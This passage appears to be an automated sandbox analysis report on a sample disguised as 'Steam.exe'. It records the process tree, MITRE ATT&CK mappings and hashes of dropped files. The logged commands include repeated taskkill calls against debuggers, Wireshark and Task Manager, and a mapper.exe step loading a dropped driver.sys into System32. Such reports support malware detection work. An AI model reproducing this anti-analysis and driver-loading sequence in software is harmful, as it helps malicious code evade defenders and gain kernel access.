  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-i386.exe
      4⤵
      PID:3264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
    3⤵
    PID:2592
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
      4⤵
      PID:2624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
    3⤵
    PID:4736
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumper.exe
      4⤵
      PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
    3⤵
    PID:2620
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OllyDbg.exe
      4⤵
      Cerber
      PID:3856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
    3⤵
    PID:4476
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im x64dbg.exe
      4⤵
      PID:704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
    3⤵
    PID:548
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im x32dbg.exe
      4⤵
      PID:4468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    3⤵
    PID:2984
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      4⤵
      PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    3⤵
    PID:1976
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerUI.exe
      4⤵
      PID:1616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    3⤵
    PID:1536
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerSvc.exe
      4⤵
      Kills process with taskkill
      PID:5040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
    3⤵
    PID:3316
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Ida64.exe
      4⤵
      Cerber
      PID:4368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
    3⤵
    PID:4980
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OllyDbg.exe
      4⤵
      Cerber
      PID:4988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
    3⤵
    PID:2372
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Dbg64.exe
      4⤵
      PID:2324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
    3⤵
    PID:2084
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Dbg32.exe
      4⤵
      PID:3340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
    3⤵
    PID:4092
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Taskmgr.exe
      4⤵
      Kills process with taskkill
      PID:2476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
    3⤵
    PID:824
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
      4⤵
      PID:4232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:1572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:64
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    3⤵
    PID:2864
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      4⤵
      PID:2216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
    3⤵
    PID:1712
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
      4⤵
      PID:1264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
    3⤵
    PID:4068
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumperClient.exe
      4⤵
      PID:2700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
    3⤵
    PID:4792
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumper.exe
      4⤵
      PID:1864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    3⤵
    PID:2728
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerUI.exe
      4⤵
      Cerber
      PID:1492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    3⤵
    PID:2532
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerSvc.exe
      4⤵
      PID:3712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
    3⤵
    PID:4088
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im ProcessHacker.exe
      4⤵
      PID:1048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
    3⤵
    PID:3112
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im idaq.exe
      4⤵
      PID:3244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
    3⤵
    PID:3552
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im idaq64.exe
      4⤵
      PID:2436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
    3⤵
    PID:2588
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Wireshark.exe
      4⤵
      Cerber
      Kills process with taskkill
      PID:636
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2036 -s 440
    3⤵
    PID:1664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6184 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:1
  2⤵
  PID:3676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4040 /prefetch:1
  2⤵
  PID:3924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
  2⤵
  PID:2092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6172 /prefetch:1
  2⤵
  PID:912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6284 /prefetch:8
  2⤵
  PID:3968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,3126849606470675762,8456197484712422487,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1156 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4420

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4724

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2136

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1824

C:\Users\Admin\Downloads\Steam.exe
"C:\Users\Admin\Downloads\Steam.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1320

C:\Users\Admin\Downloads\Steam.exe
"C:\Users\Admin\Downloads\Steam.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\mapper.exe C:\Windows\System32\driver.sys
  2⤵
  PID:1536
- - C:\Windows\System32\mapper.exe
    C:\Windows\System32\mapper.exe C:\Windows\System32\driver.sys
    3⤵
    - Sets service image path in registry
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: LoadsDriver
    PID:1600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3592

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
4c3b681f1b553061b1d406dca73509e1

SHA1
1d0902a780b041766c456dca466ed6dd88db979a

SHA256
45099d50c298e321f628997d58aff82c1f91aa302cb6a46f5c8a2819a53685d2

SHA512
b6e59b2da8bce61cdb2f0bdbe6dd0486c68bb583a1066cafb979314c4c1baeab4136d9d958e9e9ef3a36b1d7988ae8518080b8aff9748c102d05646aea914283

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
165b9ab5b6100e149d42942970795741

SHA1
873ef2b7bb080cee1f9eb80920edb54a235fc326

SHA256
fd01e423cf1b8c61bbc4e1c63f3cd70a81586a9d03a88eebd6ec3a16a1910364

SHA512
5ba31ba647b158325e7282ff6dc83e683b62895a1e3ebd5445a1f121d6d5fdee4b39164514f7c442bf67dbefcc7965c3ee946333e77047ced40df144aebef9ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
288B

MD5
343c4cc3ada10dd46a86f2e08fe9dc0c

SHA1
29cc025040bb0afd55ed04f12c092329ce9a13ce

SHA256
73507bf71dd5d08e3b1e50eaeddff0d95e99d1cc24740c014e2f97b4d83099fc

SHA512
01124fdb3cc6a8e57af2cc6b8d8ab3f71ae51eb0a08cb6bfc7f35b8c01fdb4f0aeead6375e5642546ebcbd215650852f25d9cb53cbc9ab04d6c2d6e24fc601db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
864d76274b78004e323b370df2403dd5

SHA1
92309154b123a88b788752097b41644cf9c548f8

SHA256
0ea7019dab4a7ba81c9ecad60151e5e994cf3c6859c9822a47bbefa8946b7987

SHA512
12a91d7981b3bd60dac30e273d6405887ed29516497caa25d848c607849f181c38def83127dfcc0dca4b7e2ba00c9cb737f351cb2c7ed08913f98c5fab40c250

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
144B

MD5
e563ed06b0d4831078bc1685280a76bb

SHA1
2d1cf45cdfff94fe951e610725ea2a42fb22cc45

SHA256
7ba659aa137317a8b49475c5c06e6cb693876c8905dc24eb17da8e4315ac44ec

SHA512
a89f68326e8314dbcdd1fdedf6bf8009bf69f31616a253a95718b7d8ad056996212124b7490c545fb6ae5269a27d86a9cd303b9042c834d76d82e6dbbded34aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
856B

MD5
73f074bb7fed12bfa18fd852b6d1fc31

SHA1
724a00cce501b793f0a77549440ec17bef3a6841

SHA256
c0dec0f0861625d40ebfee848deeccbae7bcaeb86d92ee41329d4a5f1b9dba1f

SHA512
2c3f4cde633967f190c54bc37241a752130a5f0e1018e1eb9629a11cd1836def9f4d8f800b0e9b142a1903e5f7b6b23c47b038198ed7e8b8fae33fdbe359e36c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
930B

MD5
05a8a3682deb753535ee24d0adf95d24

SHA1
6bb94579ee5805e8b9d4fedde4dca41e01126b99

SHA256
448fc86ca9f6c0d7a2ca1ebfc487de2caa355bc4e82abcbd232a5a452320d41d

SHA512
424f8b3c9e1c4acded1c2fda774970c9f9ecad17d02ab73c02e66aa678ba6027b9dcbb288770995ed6ba41908dd937f498a4daf8b21279a468e29c66959f80e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
89af149ce60e3013a473d92133109a4b

SHA1
cb2e4d7a41721b1d8de0a7cb80d5579e685d3717

SHA256
ff4e33ce07313e551be3fc8b0b6e4ea6dd057b04d6da44736aba644019a3e2d9

SHA512
ea63c3626abeb56d010227a0e3b3d53f479c0ad2dcdab9fad5c9b14ac5375fa8c3933539ca799c1b236e7a0cece22c6194fa8c67214e9fb2227a72aa3eada139

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
962de3228eca699da426b975aee3d065

SHA1
bb863adc1bb623d7e8a9bb63f1d4599fc526fd7f

SHA256
cae819b8ef3452f3d6ed25f4f43bda9a73a4efad54f45e8fc452cbba567a2a5e

SHA512
2b81996598bd489b2f5552a0dbdd97fb0ad670cc5b8ea3825452eb156c4d9e21948e4febbcac2aaf5f3e9d42dd6c5e770455134300c9175d2f152bf67316cce4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
12afff5d5728ca25f2263214fae29000

SHA1
661889ab91fc5ab1747d3cdc23ede08bd6c11f35

SHA256
0272735c7e678c85ab932201fcf68a2b34d3596b25294be0c7234340eda6d84b

SHA512
ee855a2471c6512fefc2a88d3a2799b0618d5d0b1d406074e5b2020e64baafe6bc01c5517b5059d87113b5525ea0b0bfe9a8f02760ec066f61b8ad27bd82db62

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
9a551f8841b2591e334897be0fcd56fc

SHA1
ba90ef203a5217fe1fd5856557af6fb25e3af69c

SHA256
bfb4ca9fb150735d97c6d2d65d2019573bb2e772442dfa274f85487ddc3b27ee

SHA512
b9eb0b0b4f1fe3ae662750b0c594e65d43a1869a8537d30483163befd4628f1e357bb40461700798a5fd1334dc1ce29c36693698bd50eb301aa8f3bdf8aa4452

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
da29ac8fbb72bb679ee33ef10509424d

SHA1
431438d4d46087178b8eb05b66a2c5bf5cd57311

SHA256
4147f6911e40a43fd5168f8bb6eb2dcb5b526b355135dbe7dc2c48623154740e

SHA512
a720aea15dc3d16e4301ce1fc31fac5f59bbac22a60ba1e3b30eab167c0c285f60a4c8f9146090849681bb28ed6eca4500cac3c0864ab1089dbdaf0bcafd6817

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
c1a7ed5ab820409de52bbc9983667e1a

SHA1
65bfd74d26ad7569e6c2a82443604a9262bbe13f

SHA256
aca2ed2c650eb899d8ecefd7b4df45f6a22aaba952737a48ac00059cf130dcef

SHA512
78afe0aee9b137f3bcb10158e247ca55ae1da25814503bfcd9adf055450f021190b366b9e73f08283ac5f71001b77e32daddc93e27e9ecf61e9f88d74c86613f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
eeec2e8fdb3d10926be7f7f005a6add4

SHA1
ef91d915a57451a526ffde4634f1152c6a751104

SHA256
3a35c99ef359936c246b01412cf6c3bd0a7b190fbfefa584d62cc27e6f6522b1

SHA512
c2044601211d75abf5bea962e73760289ec660326f7e8fce5a588a6a7672923682fa45a0876f197ec75c943d780bd06649d1810edb8331a293365dcc415cb4c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
524c0eba78201e8faad29c29d0a611ff

SHA1
b8d23f3f70313f9f0f8c1e293e70a3f8173adea9

SHA256
693ac11a04057152b30e8d26dc646186c3e54bbe397122b457374d92620fde52

SHA512
5481d83540551f9999d6dbbe94c7ac200b53bb81e5d9a5a94761274332a0b4e4aad05a9689fed5b9ad6fb2c1d06f91e2730eaa4f53950f8e14cef5cf2af452ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
538B

MD5
dd3c72405e76b071c241241fca8d6290

SHA1
0b7bdc1a92c9963575993981f65aad0c2ab3737d

SHA256
dcadd1fad58b658d594b3387fedb4a3081c00f08a6d5eed0ff6bbe2b4bbd49d8

SHA512
838beff7f60193e2da05471a4ae5a55d0bab635f85aaa0be27a58890028831c9d08d1862bbdeed660d0b20a37a72c0f9d4e751b2762a9b71c49fc294583643a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5a2d99.TMP

Filesize
538B

MD5
b149956ee36d8cccd9a41e01e6f7cd77

SHA1
08c901f1ef8af57b503b1c9ba0dd3790c47aa0e2

SHA256
b0e397ad386a17f6757883b804ec0c092211a098fc23e05de27e2e92c0582c8f

SHA512
2431fe8841306243c2d5933a4bcaa30f848491146e76d327c61c9f4c95cddcca7e2db5d65f9cf0bd5f198c2c6127ed2842cd033c1d2dfac4f48a21ff1a1a2c9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
22187943d6a33790c3a0ee759f8ef3b5

SHA1
98d5dc7dddd442dddac9b523f1058ed39a9dccd5

SHA256
a4f97e30d43941a69718b3196ae539206c8c2020b611e6770689e52a9d31db5e

SHA512
61aa55f058839dc58d95fbe3b86f2e64a1078f28a4daf0b671703dc54b7bc12544efb2192d029b6afbf09d0bd8c905bf1f374808b2dd9d6093d32f21a70d8ffb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
4e3e760d81f5ce2bb6a310132b997159

SHA1
95e1af22a565a1053f4414b900e748ac8ce72cee

SHA256
0afc32f4d6a20d8511cc4edac15eb368af0e3e6a57813b86d0dddb07438185af

SHA512
30d7bd98e75bd3920006b6421d30108a79b2a0069b04205f2b123c7e4b9cd87ac5477d31572944178fd279e9c05fd7acca61fc9a5c553a5c0eac2cc3e28ded71

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
cb91ceb5ed1bb9361372095515d782ca

SHA1
22c4581c5930a125e20628782300dd7e27650589

SHA256
c46b987577fc07f03a162a791643d1a42493b8f33e61270d25d44f9059f7044b

SHA512
e179205552a74204584486449a65326a77bf72b9d056766921442bc3c6a70bcfa78b90aff81b7583d0a28dd70867e676adeefc82095dc946ba7e2d7b05219f54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
bf5def7d6ae3c6ad76e61bb6e7908afd

SHA1
447f51a8f824668362451f8acc384c0b61d78143

SHA256
5bad758f638fe8cec1e27500cfc36ef944a232c9e233cdd032a1eb8d35c70417

SHA512
86397989c863db0b24f61ae182d1c992231fc3396184cb0bd196283562c42e1b92e9458cddc727c8dc921dc7e4d1685a25fa35c0c09eed84ddd8d0ed7b88d4b3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
c9f4d44689da9c5168380ee70876284b

SHA1
2663942330d3c738781d63e9753e9c135654fab9

SHA256
859ddf50fe8069cf1f61e928e57151bd86b8066e77824e020ff843be70f35f4c

SHA512
876972f1986241cdbeec5290126e7de66870dc66b67227ceed6b21ee8ee8b32bd7f4b69788188eacf5c2018e6cb4cb6c4fe85b9b0a1fbaf96d32c8873c1e42de

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
30ec85b2561916b74de0265526c28b8a

SHA1
e60a6c11f39d7a07487d7997b88e2622561d5520

SHA256
836cac293f5775e7bbfe0ba2da016ac0d6bc10d3b773cec73e780fed65ff0fee

SHA512
a8fe89db62538154e14c229c8fb95ddabfa40ddea7898676136073c77453dd2a11e0453bb2e4887e6b16da41fd79472070d8f084bef958083a200d2fdc40fa69

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 55145.crdownload

Filesize
1.7MB

MD5
676e5a171e4837a33e2d42cc40a091ec

SHA1
ff8f8a22e0a58769ebb10fb270f949534591c6b1

SHA256
380f08af959f4182b5f2db14b4ae907a4b013e4bd8146744ea75413d61ad1030

SHA512
25208c5b652f0645b65bb70b40a049553dbee12a67adce2f22f0dba7d6d561505d7a4a9395d9d31e5313dc78c81edf0bb7b39fbcb6aea558d9bb4cd0625f89d4

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 597303.crdownload

Filesize
512KB

MD5
9ef82cff6360dbe05ecb660eaa559950

SHA1
51e72e7a325bddb2e7ec436d1a186570f8551ab7

SHA256
fc533a0337401d6a509510887c38239223558843936ca57b1e57b1347b74bef2

SHA512
33a0b5b1b1bd581c551ae2edc575df3ce29feaecdb1489b4086aa0702ab912924c93c8c77a15218ae7bb8707e8088329c9e00996333562b8cf13e5204b28c09d

Download Submit
C:\Windows\System32\AFUWINx64.EXE

Filesize
1.1MB

MD5
9d0daba81cee203b0d39377baef9f4cb

SHA1
ed37746cbb5ed85c54aa90c3598b7069c194bad9

SHA256
1f12e8352afbb111918f2a3e7cdad8202ea4f55e691f1de55ac0bd58f2f96460

SHA512
cb29f7c6a71efa33652298f35cc878427806e2452a65c70079bf5f9fded7fb90500d9e73c96c85a2fdfa85587b7a7c365c7464e0e7b90832da6bfec3926f51cb

Download Submit
C:\Windows\System32\AMIDEWINx64.EXE

Filesize
455KB

MD5
9adfcdac59db3286690c7eede8da2528

SHA1
0b54d251438a634bd13b49a1f20587cf03d4598d

SHA256
13037eedd91f9313ec0d807947db65c639642e5ae6497e87d12fa6d19951f78e

SHA512
fde1700cdb4212593ec2733944a169c7d02f436ca6831719a33482fbfd0be289697c9aa6ce7ddfb6c245e87952b35416929bbf69753d21a24197ac6c2d1243cc

Download Submit
C:\Windows\System32\amifldrv64.sys

Filesize
29KB

MD5
f22740ba54a400fd2be7690bb204aa08

SHA1
5812387783d61c6ab5702213bb968590a18065e3

SHA256
65c26276cadda7a36f8977d1d01120edb5c3418be2317d501761092d5f9916c9

SHA512
ac1f89736cf348f634b526569b5783118a1a35324f9ce2f2804001e5a04751f8cc21d09bfa1c4803cd14a64152beba868f5ecf119f10fa3ccbe680d2fb481500

Download Submit
C:\Windows\System32\mapper.exe

Filesize
142KB

MD5
163f79092a9a989b3509b8e0771bc5f6

SHA1
908a1f520121227ae5a17b10e032ee0b6229e457

SHA256
0679d59428bdaa569cbd8d10c7fcace24d503d5c51e0401fa853e857b6c40be1

SHA512
ac99502233da167e23d2f2647c072b2fa6ad1df31ac5687be6b7edb74f424d2f3c50616549bb4df2fd232dccabbe4b8e2b2971be7aaee75f6956ac5335e3d89b

Download Submit
C:\Windows\System32\symbols\46bd5bd5b4ac076025e641070546ecc0.pdb

Filesize
907KB

MD5
34a108d0ba2d7c6b1d72b69fe8861891

